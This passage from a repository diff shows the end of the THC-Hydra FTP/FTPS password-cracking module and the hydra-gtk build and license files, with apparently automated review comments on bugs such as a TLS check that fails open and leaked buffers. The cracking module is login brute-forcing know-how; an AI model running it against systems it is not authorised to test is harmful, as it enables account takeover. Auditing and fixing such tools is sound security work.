}
free(buf);
}
next_run = 2;
break;
case 2: /* run the cracking function */
next_run = start_ftp(sock, ip, port, options, miscptr, fp);
break;
case 3: /* error exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(2);
case 4: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(2);
}
run = next_run;
}
}
void service_ftp(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
service_ftp_core(ip, sp, options, miscptr, fp, port, 0);
}
void service_ftps(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
service_ftp_core(ip, sp, options, miscptr, fp, port, 1);
}
int service_ftp_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}
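Review bot: in the AUTH TLS block of service_ftp_core(), `if ((hydra_connect_to_ssl(sock) == -1) && verbose)` makes a failed TLS handshake fatal only when verbose is set. Without -v the failure falls into the else branch and the module continues to case 2, sending USER and PASS on a socket where TLS was not established, which contradicts the comment that this mode gives up on failure. Test the return value on its own and keep verbose for the message only. Related cleanups: in start_ftp() the `return 4` paths in the 530 and '2' branches skip free(buf), `if (buf)` after `buf[0] != '3'` is checked after the dereference, and the banner check in case 1 calls hydra_child_exit(2) before the free(buf) that follows it and passes a possibly NULL buf to "%s".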

0
hydra-gtk/AUTHORS Executable file

340
hydra-gtk/COPYING Executable file

@ -0,0 +1,340 @@
GNU GENERAL PUBLIC LICENSE
Version 2, June 1991
Copyright (C) 1989, 1991 Free Software Foundation, Inc.
59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
The licenses for most software are designed to take away your
freedom to share and change it. By contrast, the GNU General Public
License is intended to guarantee your freedom to share and change free
software--to make sure the software is free for all its users. This
General Public License applies to most of the Free Software
Foundation's software and to any other program whose authors commit to
using it. (Some other Free Software Foundation software is covered by
the GNU Library General Public License instead.) You can apply it to
your programs, too.
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
this service if you wish), that you receive source code or can get it
if you want it, that you can change the software or use pieces of it
in new free programs; and that you know you can do these things.
To protect your rights, we need to make restrictions that forbid
anyone to deny you these rights or to ask you to surrender the rights.
These restrictions translate to certain responsibilities for you if you
distribute copies of the software, or if you modify it.
For example, if you distribute copies of such a program, whether
gratis or for a fee, you must give the recipients all the rights that
you have. You must make sure that they, too, receive or can get the
source code. And you must show them these terms so they know their
rights.
We protect your rights with two steps: (1) copyright the software, and
(2) offer you this license which gives you legal permission to copy,
distribute and/or modify the software.
Also, for each author's protection and ours, we want to make certain
that everyone understands that there is no warranty for this free
software. If the software is modified by someone else and passed on, we
want its recipients to know that what they have is not the original, so
that any problems introduced by others will not reflect on the original
authors' reputations.
Finally, any free program is threatened constantly by software
patents. We wish to avoid the danger that redistributors of a free
program will individually obtain patent licenses, in effect making the
program proprietary. To prevent this, we have made it clear that any
patent must be licensed for everyone's free use or not licensed at all.
The precise terms and conditions for copying, distribution and
modification follow.
GNU GENERAL PUBLIC LICENSE
TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
0. This License applies to any program or other work which contains
a notice placed by the copyright holder saying it may be distributed
under the terms of this General Public License. The "Program", below,
refers to any such program or work, and a "work based on the Program"
means either the Program or any derivative work under copyright law:
that is to say, a work containing the Program or a portion of it,
either verbatim or with modifications and/or translated into another
language. (Hereinafter, translation is included without limitation in
the term "modification".) Each licensee is addressed as "you".
Activities other than copying, distribution and modification are not
covered by this License; they are outside its scope. The act of
running the Program is not restricted, and the output from the Program
is covered only if its contents constitute a work based on the
Program (independent of having been made by running the Program).
Whether that is true depends on what the Program does.
1. You may copy and distribute verbatim copies of the Program's
source code as you receive it, in any medium, provided that you
conspicuously and appropriately publish on each copy an appropriate
copyright notice and disclaimer of warranty; keep intact all the
notices that refer to this License and to the absence of any warranty;
and give any other recipients of the Program a copy of this License
along with the Program.
You may charge a fee for the physical act of transferring a copy, and
you may at your option offer warranty protection in exchange for a fee.
2. You may modify your copy or copies of the Program or any portion
of it, thus forming a work based on the Program, and copy and
distribute such modifications or work under the terms of Section 1
above, provided that you also meet all of these conditions:
a) You must cause the modified files to carry prominent notices
stating that you changed the files and the date of any change.
b) You must cause any work that you distribute or publish, that in
whole or in part contains or is derived from the Program or any
part thereof, to be licensed as a whole at no charge to all third
parties under the terms of this License.
c) If the modified program normally reads commands interactively
when run, you must cause it, when started running for such
interactive use in the most ordinary way, to print or display an
announcement including an appropriate copyright notice and a
notice that there is no warranty (or else, saying that you provide
a warranty) and that users may redistribute the program under
these conditions, and telling the user how to view a copy of this
License. (Exception: if the Program itself is interactive but
does not normally print such an announcement, your work based on
the Program is not required to print an announcement.)
These requirements apply to the modified work as a whole. If
identifiable sections of that work are not derived from the Program,
and can be reasonably considered independent and separate works in
themselves, then this License, and its terms, do not apply to those
sections when you distribute them as separate works. But when you
distribute the same sections as part of a whole which is a work based
on the Program, the distribution of the whole must be on the terms of
this License, whose permissions for other licensees extend to the
entire whole, and thus to each and every part regardless of who wrote it.
Thus, it is not the intent of this section to claim rights or contest
your rights to work written entirely by you; rather, the intent is to
exercise the right to control the distribution of derivative or
collective works based on the Program.
In addition, mere aggregation of another work not based on the Program
with the Program (or with a work based on the Program) on a volume of
a storage or distribution medium does not bring the other work under
the scope of this License.
3. You may copy and distribute the Program (or a work based on it,
under Section 2) in object code or executable form under the terms of
Sections 1 and 2 above provided that you also do one of the following:
a) Accompany it with the complete corresponding machine-readable
source code, which must be distributed under the terms of Sections
1 and 2 above on a medium customarily used for software interchange; or,
b) Accompany it with a written offer, valid for at least three
years, to give any third party, for a charge no more than your
cost of physically performing source distribution, a complete
machine-readable copy of the corresponding source code, to be
distributed under the terms of Sections 1 and 2 above on a medium
customarily used for software interchange; or,
c) Accompany it with the information you received as to the offer
to distribute corresponding source code. (This alternative is
allowed only for noncommercial distribution and only if you
received the program in object code or executable form with such
an offer, in accord with Subsection b above.)
The source code for a work means the preferred form of the work for
making modifications to it. For an executable work, complete source
code means all the source code for all modules it contains, plus any
associated interface definition files, plus the scripts used to
control compilation and installation of the executable. However, as a
special exception, the source code distributed need not include
anything that is normally distributed (in either source or binary
form) with the major components (compiler, kernel, and so on) of the
operating system on which the executable runs, unless that component
itself accompanies the executable.
If distribution of executable or object code is made by offering
access to copy from a designated place, then offering equivalent
access to copy the source code from the same place counts as
distribution of the source code, even though third parties are not
compelled to copy the source along with the object code.
4. You may not copy, modify, sublicense, or distribute the Program
except as expressly provided under this License. Any attempt
otherwise to copy, modify, sublicense or distribute the Program is
void, and will automatically terminate your rights under this License.
However, parties who have received copies, or rights, from you under
this License will not have their licenses terminated so long as such
parties remain in full compliance.
5. You are not required to accept this License, since you have not
signed it. However, nothing else grants you permission to modify or
distribute the Program or its derivative works. These actions are
prohibited by law if you do not accept this License. Therefore, by
modifying or distributing the Program (or any work based on the
Program), you indicate your acceptance of this License to do so, and
all its terms and conditions for copying, distributing or modifying
the Program or works based on it.
6. Each time you redistribute the Program (or any work based on the
Program), the recipient automatically receives a license from the
original licensor to copy, distribute or modify the Program subject to
these terms and conditions. You may not impose any further
restrictions on the recipients' exercise of the rights granted herein.
You are not responsible for enforcing compliance by third parties to
this License.
7. If, as a consequence of a court judgment or allegation of patent
infringement or for any other reason (not limited to patent issues),
conditions are imposed on you (whether by court order, agreement or
otherwise) that contradict the conditions of this License, they do not
excuse you from the conditions of this License. If you cannot
distribute so as to satisfy simultaneously your obligations under this
License and any other pertinent obligations, then as a consequence you
may not distribute the Program at all. For example, if a patent
license would not permit royalty-free redistribution of the Program by
all those who receive copies directly or indirectly through you, then
the only way you could satisfy both it and this License would be to
refrain entirely from distribution of the Program.
If any portion of this section is held invalid or unenforceable under
any particular circumstance, the balance of the section is intended to
apply and the section as a whole is intended to apply in other
circumstances.
It is not the purpose of this section to induce you to infringe any
patents or other property right claims or to contest validity of any
such claims; this section has the sole purpose of protecting the
integrity of the free software distribution system, which is
implemented by public license practices. Many people have made
generous contributions to the wide range of software distributed
through that system in reliance on consistent application of that
system; it is up to the author/donor to decide if he or she is willing
to distribute software through any other system and a licensee cannot
impose that choice.
This section is intended to make thoroughly clear what is believed to
be a consequence of the rest of this License.
8. If the distribution and/or use of the Program is restricted in
certain countries either by patents or by copyrighted interfaces, the
original copyright holder who places the Program under this License
may add an explicit geographical distribution limitation excluding
those countries, so that distribution is permitted only in or among
countries not thus excluded. In such case, this License incorporates
the limitation as if written in the body of this License.
9. The Free Software Foundation may publish revised and/or new versions
of the General Public License from time to time. Such new versions will
be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.
Each version is given a distinguishing version number. If the Program
specifies a version number of this License which applies to it and "any
later version", you have the option of following the terms and conditions
either of that version or of any later version published by the Free
Software Foundation. If the Program does not specify a version number of
this License, you may choose any version ever published by the Free Software
Foundation.
10. If you wish to incorporate parts of the Program into other free
programs whose distribution conditions are different, write to the author
to ask for permission. For software which is copyrighted by the Free
Software Foundation, write to the Free Software Foundation; we sometimes
make exceptions for this. Our decision will be guided by the two goals
of preserving the free status of all derivatives of our free software and
of promoting the sharing and reuse of software generally.
NO WARRANTY
11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN
OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS
TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE
PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
REPAIR OR CORRECTION.
12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES.
END OF TERMS AND CONDITIONS
How to Apply These Terms to Your New Programs
If you develop a new program, and you want it to be of the greatest
possible use to the public, the best way to achieve this is to make it
free software which everyone can redistribute and change under these terms.
To do so, attach the following notices to the program. It is safest
to attach them to the start of each source file to most effectively
convey the exclusion of warranty; and each file should have at least
the "copyright" line and a pointer to where the full notice is found.
<one line to give the program's name and a brief idea of what it does.>
Copyright (C) <year> <name of author>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
Also add information on how to contact you by electronic and paper mail.
If the program is interactive, make it output a short notice like this
when it starts in an interactive mode:
Gnomovision version 69, Copyright (C) year name of author
Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
This is free software, and you are welcome to redistribute it
under certain conditions; type `show c' for details.
The hypothetical commands `show w' and `show c' should show the appropriate
parts of the General Public License. Of course, the commands you use may
be called something other than `show w' and `show c'; they could even be
mouse-clicks or menu items--whatever suits your program.
You should also get your employer (if you work as a programmer) or your
school, if any, to sign a "copyright disclaimer" for the program, if
necessary. Here is a sample; alter the names:
Yoyodyne, Inc., hereby disclaims all copyright interest in the program
`Gnomovision' (which makes passes at compilers) written by James Hacker.
<signature of Ty Coon>, 1 April 1989
Ty Coon, President of Vice
This General Public License does not permit incorporating your program into
proprietary programs. If your program is a subroutine library, you may
consider it more useful to permit linking proprietary applications with the
library. If this is what you want to do, use the GNU Library General
Public License instead of this License.
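Review bot: the sample notice in this license text reads "either version 2 of the License", so this copy is GPL version 2, while the CHANGES entry for Release 7.5 in the same commit says the project moved from GPLv3 to AGPLv3 (see LICENSE file). State which license covers the code this copy ships with, for example in the README beside it, so that redistributors do not have to guess. Keep the license text itself verbatim.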

0
hydra-gtk/ChangeLog Executable file

182
hydra-gtk/INSTALL Executable file

@ -0,0 +1,182 @@
Basic Installation
==================
These are generic installation instructions.
The `configure' shell script attempts to guess correct values for
various system-dependent variables used during compilation. It uses
those values to create a `Makefile' in each directory of the package.
It may also create one or more `.h' files containing system-dependent
definitions. Finally, it creates a shell script `config.status' that
you can run in the future to recreate the current configuration, a file
`config.cache' that saves the results of its tests to speed up
reconfiguring, and a file `config.log' containing compiler output
(useful mainly for debugging `configure').
If you need to do unusual things to compile the package, please try
to figure out how `configure' could check whether to do them, and mail
diffs or instructions to the address given in the `README' so they can
be considered for the next release. If at some point `config.cache'
contains results you don't want to keep, you may remove or edit it.
The file `configure.in' is used to create `configure' by a program
called `autoconf'. You only need `configure.in' if you want to change
it or regenerate `configure' using a newer version of `autoconf'.
The simplest way to compile this package is:
1. `cd' to the directory containing the package's source code and type
`./configure' to configure the package for your system. If you're
using `csh' on an old version of System V, you might need to type
`sh ./configure' instead to prevent `csh' from trying to execute
`configure' itself.
Running `configure' takes awhile. While running, it prints some
messages telling which features it is checking for.
2. Type `make' to compile the package.
3. Optionally, type `make check' to run any self-tests that come with
the package.
4. Type `make install' to install the programs and any data files and
documentation.
5. You can remove the program binaries and object files from the
source code directory by typing `make clean'. To also remove the
files that `configure' created (so you can compile the package for
a different kind of computer), type `make distclean'. There is
also a `make maintainer-clean' target, but that is intended mainly
for the package's developers. If you use it, you may have to get
all sorts of other programs in order to regenerate files that came
with the distribution.
Compilers and Options
=====================
Some systems require unusual options for compilation or linking that
the `configure' script does not know about. You can give `configure'
initial values for variables by setting them in the environment. Using
a Bourne-compatible shell, you can do that on the command line like
this:
CC=c89 CFLAGS=-O2 LIBS=-lposix ./configure
Or on systems that have the `env' program, you can do it like this:
env CPPFLAGS=-I/usr/local/include LDFLAGS=-s ./configure
Compiling For Multiple Architectures
====================================
You can compile the package for more than one kind of computer at the
same time, by placing the object files for each architecture in their
own directory. To do this, you must use a version of `make' that
supports the `VPATH' variable, such as GNU `make'. `cd' to the
directory where you want the object files and executables to go and run
the `configure' script. `configure' automatically checks for the
source code in the directory that `configure' is in and in `..'.
If you have to use a `make' that does not supports the `VPATH'
variable, you have to compile the package for one architecture at a time
in the source code directory. After you have installed the package for
one architecture, use `make distclean' before reconfiguring for another
architecture.
Installation Names
==================
By default, `make install' will install the package's files in
`/usr/local/bin', `/usr/local/man', etc. You can specify an
installation prefix other than `/usr/local' by giving `configure' the
option `--prefix=PATH'.
You can specify separate installation prefixes for
architecture-specific files and architecture-independent files. If you
give `configure' the option `--exec-prefix=PATH', the package will use
PATH as the prefix for installing programs and libraries.
Documentation and other data files will still use the regular prefix.
In addition, if you use an unusual directory layout you can give
options like `--bindir=PATH' to specify different values for particular
kinds of files. Run `configure --help' for a list of the directories
you can set and what kinds of files go in them.
If the package supports it, you can cause programs to be installed
with an extra prefix or suffix on their names by giving `configure' the
option `--program-prefix=PREFIX' or `--program-suffix=SUFFIX'.
Optional Features
=================
Some packages pay attention to `--enable-FEATURE' options to
`configure', where FEATURE indicates an optional part of the package.
They may also pay attention to `--with-PACKAGE' options, where PACKAGE
is something like `gnu-as' or `x' (for the X Window System). The
`README' should mention any `--enable-' and `--with-' options that the
package recognizes.
For packages that use the X Window System, `configure' can usually
find the X include and library files automatically, but if it doesn't,
you can use the `configure' options `--x-includes=DIR' and
`--x-libraries=DIR' to specify their locations.
Specifying the System Type
==========================
There may be some features `configure' can not figure out
automatically, but needs to determine by the type of host the package
will run on. Usually `configure' can figure that out, but if it prints
a message saying it can not guess the host type, give it the
`--host=TYPE' option. TYPE can either be a short name for the system
type, such as `sun4', or a canonical name with three fields:
CPU-COMPANY-SYSTEM
See the file `config.sub' for the possible values of each field. If
`config.sub' isn't included in this package, then this package doesn't
need to know the host type.
If you are building compiler tools for cross-compiling, you can also
use the `--target=TYPE' option to select the type of system they will
produce code for and the `--build=TYPE' option to select the type of
system on which you are compiling the package.
Sharing Defaults
================
If you want to set default values for `configure' scripts to share,
you can create a site shell script called `config.site' that gives
default values for variables like `CC', `cache_file', and `prefix'.
`configure' looks for `PREFIX/share/config.site' if it exists, then
`PREFIX/etc/config.site' if it exists. Or, you can set the
`CONFIG_SITE' environment variable to the location of the site script.
A warning: not all `configure' scripts look for a site script.
Operation Controls
==================
`configure' recognizes the following options to control how it
operates.
`--cache-file=FILE'
Use and save the results of the tests in FILE instead of
`./config.cache'. Set FILE to `/dev/null' to disable caching, for
debugging `configure'.
`--help'
Print a summary of the options to `configure', and exit.
`--quiet'
`--silent'
`-q'
Do not print messages saying which checks are being made. To
suppress all normal output, redirect it to `/dev/null' (any error
messages will still be shown).
`--srcdir=DIR'
Look for the package's source code in directory DIR. Usually
`configure' can determine that directory automatically.
`--version'
Print the version of Autoconf used to generate the `configure'
script, and exit.
`configure' also accepts some other, not widely useful, options.
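Review bot: this is the generic autoconf INSTALL text and says nothing specific to hydra-gtk. Its "Optional Features" section defers to the README for any `--enable-' and `--with-' options, and the Makefile.in added in this commit substitutes PKG_CONFIG, PACKAGE_CFLAGS and PACKAGE_LIBS, yet nothing here tells a builder what has to be installed before `./configure' will succeed. Add a short package-specific section, or a pointer to the README, listing the build prerequisites. Minor: under "Compiling For Multiple Architectures", "does not supports the `VPATH' variable" should read "does not support".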

30
hydra-gtk/Makefile.am Executable file

@ -0,0 +1,30 @@
## Process this file with automake to produce Makefile.in
SUBDIRS = src
EXTRA_DIST = \
autogen.sh \
xhydra.glade \
xhydra.gladep
install-data-local:
@$(NORMAL_INSTALL)
if test -d $(srcdir)/pixmaps; then \
$(mkinstalldirs) $(DESTDIR)$(pkgdatadir)/pixmaps; \
for pixmap in $(srcdir)/pixmaps/*; do \
if test -f $$pixmap; then \
$(INSTALL_DATA) $$pixmap $(DESTDIR)$(pkgdatadir)/pixmaps; \
fi \
done \
fi
dist-hook:
if test -d pixmaps; then \
mkdir $(distdir)/pixmaps; \
for pixmap in pixmaps/*; do \
if test -f $$pixmap; then \
cp -p $$pixmap $(distdir)/pixmaps; \
fi \
done \
fi
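Review bot: in both install-data-local and dist-hook the loop variable and the destination paths are expanded unquoted (`test -f $$pixmap`, `$(INSTALL_DATA) $$pixmap $(DESTDIR)$(pkgdatadir)/pixmaps`, `cp -p $$pixmap $(distdir)/pixmaps`), so a pixmap name or a DESTDIR containing whitespace is split into several arguments and the rule copies or tests the wrong paths. Quote them, as in "$$pixmap" and "$(DESTDIR)$(pkgdatadir)/pixmaps". There is also no uninstall-local rule to match install-data-local, so `make uninstall` leaves the installed pixmaps behind; add one that removes the files this rule installs.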

382
hydra-gtk/Makefile.in Executable file

@ -0,0 +1,382 @@
# Makefile.in generated automatically by automake 1.4-p6 from Makefile.am
# Copyright (C) 1994, 1995-8, 1999, 2001 Free Software Foundation, Inc.
# This Makefile.in is free software; the Free Software Foundation
# gives unlimited permission to copy and/or distribute it,
# with or without modifications, as long as this notice is preserved.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY, to the extent permitted by law; without
# even the implied warranty of MERCHANTABILITY or FITNESS FOR A
# PARTICULAR PURPOSE.
SHELL = @SHELL@
srcdir = @srcdir@
top_srcdir = @top_srcdir@
VPATH = @srcdir@
prefix = @prefix@
exec_prefix = @exec_prefix@
bindir = @bindir@
sbindir = @sbindir@
libexecdir = @libexecdir@
datadir = @datadir@
sysconfdir = @sysconfdir@
sharedstatedir = @sharedstatedir@
localstatedir = @localstatedir@
libdir = @libdir@
infodir = @infodir@
mandir = @mandir@
includedir = @includedir@
oldincludedir = /usr/include
DESTDIR =
pkgdatadir = $(datadir)/@PACKAGE@
pkglibdir = $(libdir)/@PACKAGE@
pkgincludedir = $(includedir)/@PACKAGE@
top_builddir = .
ACLOCAL = @ACLOCAL@
AUTOCONF = @AUTOCONF@
AUTOMAKE = @AUTOMAKE@
AUTOHEADER = @AUTOHEADER@
INSTALL = @INSTALL@
INSTALL_PROGRAM = @INSTALL_PROGRAM@ $(AM_INSTALL_PROGRAM_FLAGS)
INSTALL_DATA = @INSTALL_DATA@
INSTALL_SCRIPT = @INSTALL_SCRIPT@
transform = @program_transform_name@
NORMAL_INSTALL = :
PRE_INSTALL = :
POST_INSTALL = :
NORMAL_UNINSTALL = :
PRE_UNINSTALL = :
POST_UNINSTALL = :
CC = @CC@
MAINT = @MAINT@
MAKEINFO = @MAKEINFO@
PACKAGE = @PACKAGE@
PACKAGE_CFLAGS = @PACKAGE_CFLAGS@
PACKAGE_LIBS = @PACKAGE_LIBS@
PKG_CONFIG = @PKG_CONFIG@
VERSION = @VERSION@
SUBDIRS = src
EXTRA_DIST = autogen.sh xhydra.glade xhydra.gladep
ACLOCAL_M4 = $(top_srcdir)/aclocal.m4
mkinstalldirs = $(SHELL) $(top_srcdir)/mkinstalldirs
CONFIG_HEADER = config.h
CONFIG_CLEAN_FILES =
DIST_COMMON = README ./stamp-h.in AUTHORS COPYING ChangeLog INSTALL \
Makefile.am Makefile.in NEWS acconfig.h aclocal.m4 config.h.in \
configure configure.in install-sh missing mkinstalldirs
DISTFILES = $(DIST_COMMON) $(SOURCES) $(HEADERS) $(TEXINFOS) $(EXTRA_DIST)
TAR = tar
GZIP_ENV = --best
all: all-redirect
.SUFFIXES:
$(srcdir)/Makefile.in: @MAINTAINER_MODE_TRUE@ Makefile.am $(top_srcdir)/configure.in $(ACLOCAL_M4)
cd $(top_srcdir) && $(AUTOMAKE) --gnu Makefile
Makefile: $(srcdir)/Makefile.in $(top_builddir)/config.status $(BUILT_SOURCES)
cd $(top_builddir) \
&& CONFIG_FILES=$@ CONFIG_HEADERS= $(SHELL) ./config.status
$(ACLOCAL_M4): @MAINTAINER_MODE_TRUE@ configure.in
cd $(srcdir) && $(ACLOCAL)
config.status: $(srcdir)/configure $(CONFIG_STATUS_DEPENDENCIES)
$(SHELL) ./config.status --recheck
$(srcdir)/configure: @MAINTAINER_MODE_TRUE@$(srcdir)/configure.in $(ACLOCAL_M4) $(CONFIGURE_DEPENDENCIES)
cd $(srcdir) && $(AUTOCONF)
config.h: stamp-h
@if test ! -f $@; then \
rm -f stamp-h; \
$(MAKE) stamp-h; \
else :; fi
stamp-h: $(srcdir)/config.h.in $(top_builddir)/config.status
cd $(top_builddir) \
&& CONFIG_FILES= CONFIG_HEADERS=config.h \
$(SHELL) ./config.status
@echo timestamp > stamp-h 2> /dev/null
$(srcdir)/config.h.in: @MAINTAINER_MODE_TRUE@$(srcdir)/stamp-h.in
@if test ! -f $@; then \
rm -f $(srcdir)/stamp-h.in; \
$(MAKE) $(srcdir)/stamp-h.in; \
else :; fi
$(srcdir)/stamp-h.in: $(top_srcdir)/configure.in $(ACLOCAL_M4) acconfig.h
cd $(top_srcdir) && $(AUTOHEADER)
@echo timestamp > $(srcdir)/stamp-h.in 2> /dev/null
mostlyclean-hdr:
clean-hdr:
distclean-hdr:
-rm -f config.h
maintainer-clean-hdr:
# This directory's subdirectories are mostly independent; you can cd
# into them and run `make' without going through this Makefile.
# To change the values of `make' variables: instead of editing Makefiles,
# (1) if the variable is set in `config.status', edit `config.status'
# (which will cause the Makefiles to be regenerated when you run `make');
# (2) otherwise, pass the desired values on the `make' command line.
@SET_MAKE@
all-recursive install-data-recursive install-exec-recursive \
installdirs-recursive install-recursive uninstall-recursive \
check-recursive installcheck-recursive info-recursive dvi-recursive:
@set fnord $(MAKEFLAGS); amf=$$2; \
dot_seen=no; \
target=`echo $@ | sed s/-recursive//`; \
list='$(SUBDIRS)'; for subdir in $$list; do \
echo "Making $$target in $$subdir"; \
if test "$$subdir" = "."; then \
dot_seen=yes; \
local_target="$$target-am"; \
else \
local_target="$$target"; \
fi; \
(cd $$subdir && $(MAKE) $(AM_MAKEFLAGS) $$local_target) \
|| case "$$amf" in *=*) exit 1;; *k*) fail=yes;; *) exit 1;; esac; \
done; \
if test "$$dot_seen" = "no"; then \
$(MAKE) $(AM_MAKEFLAGS) "$$target-am" || exit 1; \
fi; test -z "$$fail"
mostlyclean-recursive clean-recursive distclean-recursive \
maintainer-clean-recursive:
@set fnord $(MAKEFLAGS); amf=$$2; \
dot_seen=no; \
rev=''; list='$(SUBDIRS)'; for subdir in $$list; do \
rev="$$subdir $$rev"; \
test "$$subdir" != "." || dot_seen=yes; \
done; \
test "$$dot_seen" = "no" && rev=". $$rev"; \
target=`echo $@ | sed s/-recursive//`; \
for subdir in $$rev; do \
echo "Making $$target in $$subdir"; \
if test "$$subdir" = "."; then \
local_target="$$target-am"; \
else \
local_target="$$target"; \
fi; \
(cd $$subdir && $(MAKE) $(AM_MAKEFLAGS) $$local_target) \
|| case "$$amf" in *=*) exit 1;; *k*) fail=yes;; *) exit 1;; esac; \
done && test -z "$$fail"
tags-recursive:
list='$(SUBDIRS)'; for subdir in $$list; do \
test "$$subdir" = . || (cd $$subdir && $(MAKE) $(AM_MAKEFLAGS) tags); \
done
tags: TAGS
ID: $(HEADERS) $(SOURCES) $(LISP)
list='$(SOURCES) $(HEADERS)'; \
unique=`for i in $$list; do echo $$i; done | \
awk ' { files[$$0] = 1; } \
END { for (i in files) print i; }'`; \
here=`pwd` && cd $(srcdir) \
&& mkid -f$$here/ID $$unique $(LISP)
TAGS: tags-recursive $(HEADERS) $(SOURCES) config.h.in $(TAGS_DEPENDENCIES) $(LISP)
tags=; \
here=`pwd`; \
list='$(SUBDIRS)'; for subdir in $$list; do \
if test "$$subdir" = .; then :; else \
test -f $$subdir/TAGS && tags="$$tags -i $$here/$$subdir/TAGS"; \
fi; \
done; \
list='$(SOURCES) $(HEADERS)'; \
unique=`for i in $$list; do echo $$i; done | \
awk ' { files[$$0] = 1; } \
END { for (i in files) print i; }'`; \
test -z "$(ETAGS_ARGS)config.h.in$$unique$(LISP)$$tags" \
|| (cd $(srcdir) && etags $(ETAGS_ARGS) $$tags config.h.in $$unique $(LISP) -o $$here/TAGS)
mostlyclean-tags:
clean-tags:
distclean-tags:
-rm -f TAGS ID
maintainer-clean-tags:
distdir = $(PACKAGE)-$(VERSION)
top_distdir = $(distdir)
# This target untars the dist file and tries a VPATH configuration. Then
# it guarantees that the distribution is self-contained by making another
# tarfile.
distcheck: dist
-rm -rf $(distdir)
GZIP=$(GZIP_ENV) $(TAR) zxf $(distdir).tar.gz
mkdir $(distdir)/=build
mkdir $(distdir)/=inst
dc_install_base=`cd $(distdir)/=inst && pwd`; \
cd $(distdir)/=build \
&& ../configure --srcdir=.. --prefix=$$dc_install_base \
&& $(MAKE) $(AM_MAKEFLAGS) \
&& $(MAKE) $(AM_MAKEFLAGS) dvi \
&& $(MAKE) $(AM_MAKEFLAGS) check \
&& $(MAKE) $(AM_MAKEFLAGS) install \
&& $(MAKE) $(AM_MAKEFLAGS) installcheck \
&& $(MAKE) $(AM_MAKEFLAGS) dist
-rm -rf $(distdir)
@banner="$(distdir).tar.gz is ready for distribution"; \
dashes=`echo "$$banner" | sed s/./=/g`; \
echo "$$dashes"; \
echo "$$banner"; \
echo "$$dashes"
dist: distdir
-chmod -R a+r $(distdir)
GZIP=$(GZIP_ENV) $(TAR) chozf $(distdir).tar.gz $(distdir)
-rm -rf $(distdir)
dist-all: distdir
-chmod -R a+r $(distdir)
GZIP=$(GZIP_ENV) $(TAR) chozf $(distdir).tar.gz $(distdir)
-rm -rf $(distdir)
distdir: $(DISTFILES)
-rm -rf $(distdir)
mkdir $(distdir)
-chmod 777 $(distdir)
here=`cd $(top_builddir) && pwd`; \
top_distdir=`cd $(distdir) && pwd`; \
distdir=`cd $(distdir) && pwd`; \
cd $(top_srcdir) \
&& $(AUTOMAKE) --include-deps --build-dir=$$here --srcdir-name=$(top_srcdir) --output-dir=$$top_distdir --gnu Makefile
@for file in $(DISTFILES); do \
d=$(srcdir); \
if test -d $$d/$$file; then \
cp -pr $$d/$$file $(distdir)/$$file; \
else \
test -f $(distdir)/$$file \
|| ln $$d/$$file $(distdir)/$$file 2> /dev/null \
|| cp -p $$d/$$file $(distdir)/$$file || :; \
fi; \
done
for subdir in $(SUBDIRS); do \
if test "$$subdir" = .; then :; else \
test -d $(distdir)/$$subdir \
|| mkdir $(distdir)/$$subdir \
|| exit 1; \
chmod 777 $(distdir)/$$subdir; \
(cd $$subdir && $(MAKE) $(AM_MAKEFLAGS) top_distdir=../$(distdir) distdir=../$(distdir)/$$subdir distdir) \
|| exit 1; \
fi; \
done
$(MAKE) $(AM_MAKEFLAGS) top_distdir="$(top_distdir)" distdir="$(distdir)" dist-hook
info-am:
info: info-recursive
